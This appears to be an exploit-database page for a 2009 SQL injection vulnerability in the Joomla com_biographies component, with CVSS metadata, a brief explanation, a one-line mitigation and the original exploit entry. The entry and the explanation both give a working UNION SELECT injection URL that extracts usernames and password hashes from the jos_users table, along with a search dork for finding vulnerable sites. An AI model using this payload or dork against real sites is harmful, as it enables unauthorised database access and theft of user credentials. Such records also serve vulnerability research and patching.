header-logo
Suggest Exploit
vendor:
com_biographies
by:
Snakespc ALGERIAN HaCkEr
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_biographies
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla (com_biographies) SQL injection Vulnerability

An attacker can exploit this vulnerability by crafting a malicious SQL query and sending it to the vulnerable application. This can be done by appending the crafted query to the vulnerable parameter in the URL. For example, http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#--------------------------------------------------------
#Joomla (com_biographies) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Dork:inurl"com_biographies"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--

Navigation

Suggest Exploit

Services By CQR